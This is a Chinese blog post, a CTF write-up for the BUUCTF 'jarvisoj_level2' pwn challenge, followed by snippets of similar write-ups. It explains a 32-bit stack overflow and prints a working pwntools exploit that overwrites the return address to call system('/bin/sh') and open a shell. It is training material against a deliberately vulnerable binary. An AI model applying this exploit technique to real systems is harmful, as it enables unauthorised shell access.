[BUUCTF]PWN16——jarvisoj_level2

最新推荐文章于 2024-05-09 22:28:34 发布
最新推荐文章于 2024-05-09 22:28:34 发布
阅读量1.9k 收藏 3
点赞数 3
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/108338722
版权

[BUUCTF]PWN16——jarvisoj_level2

附件

步骤
例行检查,32位,开启了nx保护
在这里插入图片描述
试运行一下程序
在这里插入图片描述
32位ida载入,shift+f12查看一下程序里的字符串,发现了system函数和 /bin/sh 字符串
在这里插入图片描述
双击跟进,ctrl+x本想查看调用该字符串的函数的,没有找到,但是程序里有这些字符串的位置,
shell_addr=0x804a024
在这里插入图片描述
system_addr=0x8048320
在这里插入图片描述
我们可以直接利用这些构造 system(/bin/sh)去执行
跟进试运行时候看到的字符串,找到输入点
在这里插入图片描述
buf的大小是0x88,读入的数据大小是0x100,可以溢出0x78个字节,用来构造rop足够

EXP:

from pwn import*

r=remote('node3.buuoj.cn',26675)
shell_addr=0x804a024
system=0x8048320

payload='a'*(0x88+4)+p32(system)+p32(8)+p32(shell_addr)

r.sendline(payload)
r.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
专栏目录
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
[BUUCTF-pwn]——jarvisoj_level2
Y_peak的博客
02-10 787
[BUUCTF-pwn]——jarvisoj_level2 题目地址:https://buuoj.cn/challenges#jarvisoj_level2 checksec 一下下, 32程序 IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下 exploit from pwn import * p = remote("node3.buuoj.cn",28375) binsh = 0
CTF buuoj pwn-----第9题:jarvisoj_level2
bing_Max的博客
09-27 753
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
jarvisoj_level2[BUUCTF]
最新发布
moonlightsunshin的博客
05-09 171
从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出,IDA会告诉我们buf数组与ebp在栈上的相对位置,即&buf=$ebp-0x88,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且system()的地址可以轻松在plt表中找到,为0x08048320,因此我们只需要在构造一个shell路径的字符转就可以getshell了。
[BUUCTF]PWN------jarvisoj_level2
BangSen1的博客
01-20 306
jarvisoj_level2 例行检查,32bit,开启NX保护。 nc 一下 ,Hello world,没什么信息 用32位IDA打开,看到了/bin/sh,跟进一下。 想查看调用函数的,但是看不了,所幸地址已经给出,所以shell_addr=0x804A024 system_addr=0x8048320 直接利用这些构造 system(/bin/sh)去执行 找到输入点 buf的大小是0x88,读入的数据大小是0x100,多余空间足以构造rop exp flag ...
BUUCTF jarvisoj_level2
小白垃圾笔记2
04-30 71
本来我记得system的第一个参数是返回地址,但是打了没打通,我就试了这个结果打通了。思路大概就是将返回地址覆盖为system函数的地址,然后填入参数bin/sh。存在溢出,并且有系统函数的调用,那么看下又没有/bin/sh。32位程序,开了nx,放到ida里瞧瞧。小白做题笔记而已,不建议阅读观看。快捷键 shift+f12。nice,构造payload。
jarvisoj_level2_x64
zip471642048的博客
06-24 562
题目地址 : https://buuoj.cn/challenges#jarvisoj_level2_x64 /bin/sh字符串 exp
buuctf jarvisoj_level2
carol2358的博客
04-19 284
水题 可以在ida里找到system和/bin/sh(alt+t) 然后构造payload就完事了 from pwn import * from LibcSearcher import * context(log_level = 'debug',arch ='i386',os = 'linux' ) r = remote('node3.buuoj.cn', 28847) #r = proc...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
jarvisoj_level2
weixin_56301399的博客
07-22 465
要先看函数结构,在去看栈结构,system和/bin/sh的位置很重要。
[CTF]jarvisoj_level2
凉水的博客
01-12 498
解题思路 反编译后的源码: undefined4 main(void) { vulnerable_function(); system("echo \'Hello World!\'"); return 0; } void vulnerable_function(void) { undefined local_8c [136]; system("echo Input:"); read(0,local_8c,0x100); return; } 看完上面的反编译,直觉system函数
jarvisoj_level2题解
OrientalGlass的博客
01-08 227
这题没有现成的system("/bin/sh")可以调用,但是有system函数和/bin/sh字符串。所以可以通过溢出修改返回函数为call system位置,并且将栈顶元素修改为/bin/sh所在地址。这样就可以成功执行system("/bin/sh")2.ida查看,很显然这里有栈溢出。4.寻找system和bin/sh。1.checksec查看。
jarvis oj level2–两种方式构造函数栈
超人学飞的日子
04-07 594
关于这个level2,在网上找到了两种解法,放在一起分析了一下。 首先查看题目基本信息: 程序开启了栈不可执行保护。 IDA查看反汇编代码: 可以看到存在栈溢出,并且程序调用了system函数。 所以我们的思路就是构造vulnerable_function()的buf变量,使得:返回地址被覆盖为system函数的地址,构造system函数的栈帧,并为system传递参数’/b...
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3551
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
jarvisoj_level1
08-28
很抱歉,我无法回答这个问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新,欢迎共享,不要白嫖哦](https://download.csdn.net/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值